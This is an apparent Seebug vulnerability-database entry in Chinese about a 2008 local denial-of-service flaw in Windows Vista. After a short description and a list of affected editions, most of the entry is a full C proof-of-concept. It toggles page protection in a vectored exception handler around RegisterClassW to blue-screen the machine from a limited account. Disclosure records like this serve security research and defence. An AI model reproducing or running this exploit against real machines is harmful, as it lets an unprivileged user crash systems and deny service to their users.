Microsoft Windows Vista本地拒绝服务漏洞

2008-10-08T00:00:00
ID SSV:4164
Type seebug
Reporter Root
Modified 2008-10-08T00:00:00

Description

BUGTRAQ ID: 31570 CNCAN ID:CNCAN-2008100607

Microsoft Windows Vista是一款微软开发的操作系统。 Microsoft Windows Vista存在一个访问验证错误,本地攻击者可以利用漏洞使系统崩溃,造成拒绝服务攻击。

Microsoft Windows Vista Ultimate 64-bit edition SP1 Microsoft Windows Vista Ultimate 64-bit edition 0 Microsoft Windows Vista Home Premium 64-bit edition SP1 Microsoft Windows Vista Home Premium 64-bit edition 0 Microsoft Windows Vista Ultimate SP1 Microsoft Windows Vista Ultimate Microsoft Windows Vista Home Premium SP1 Microsoft Windows Vista Home Premium 目前没有解决方案提供: <a href=http://www.microsoft.com/ target=_blank>http://www.microsoft.com/</a>

                                        
                                            
                                                // //////////////////////////////////////////////////////////////
// Windows Vista BSoD (Access violation) from limited account. //
// Tested on Home Premium &amp; Ultimate @ October 05 2008 //
/////////////////////////////////////////////////////////////////
#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;
 
WCHAR szClass[] = L&quot;BSODClass&quot;;
 
int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo);
typedef void (WINAPI* pFunc)(ULONG ulFirst, LPVOID lpHandler);
pFunc pRtlAddVectoredExceptionHandler;
 
typedef struct
{
DWORD dwWriteViolation;
LPVOID lpAddress;
} EXCEPTION_ACCESS_VIOLATION_PARAMS;
 
int main()
{
WNDCLASSW wc;
DWORD dwOldProt;
 
printf(&quot;Windows Vista BSoD from usermode/limited account.\n&quot;
&quot;Coded by. Defsanguje - October 05 2008\n&quot;);
 
// Setup vectored exception handler. SEH would work also.
pRtlAddVectoredExceptionHandler =
(pFunc)GetProcAddress((HMODULE)GetModuleHandle(&quot;ntdll.dll&quot;),
 
&quot;RtlAddVectoredExceptionHandler&quot;);
(*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);
 
// Dummy data
wc.style = 0;
wc.lpfnWndProc = NULL;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = GetModuleHandle(NULL);
wc.hIcon = NULL;
wc.hCursor = LoadCursor(NULL, IDC_ARROW);
wc.hbrBackground = GetStockObject(HOLLOW_BRUSH);
wc.lpszMenuName = NULL;
wc.lpszClassName = szClass;
 
VirtualProtect(szClass, 1, PAGE_NOACCESS, &amp;dwOldProt);
RegisterClassW(&amp;wc);
 
printf(&quot;You shouldn't see this&quot;);
return 0;
}
 
int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo)
{
static LPVOID lpLastAddress;
static DWORD dwOldProt;
EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;
switch(lpExceptionInfo-&gt;ExceptionRecord-&gt;ExceptionCode)
{
case EXCEPTION_ACCESS_VIOLATION:
avParams =
(EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo-&gt;ExceptionRecord-&gt;Excep
tionInformation;
VirtualProtect(avParams-&gt;lpAddress, 1, PAGE_READWRITE,
&amp;dwOldProt);
lpLastAddress = avParams-&gt;lpAddress;
 
// Set trap flag
lpExceptionInfo-&gt;ContextRecord-&gt;EFlags |= 0x100;
break;
case STATUS_SINGLE_STEP:
VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &amp;dwOldProt);
break;
default:
break;
}
return EXCEPTION_CONTINUE_EXECUTION;
;
}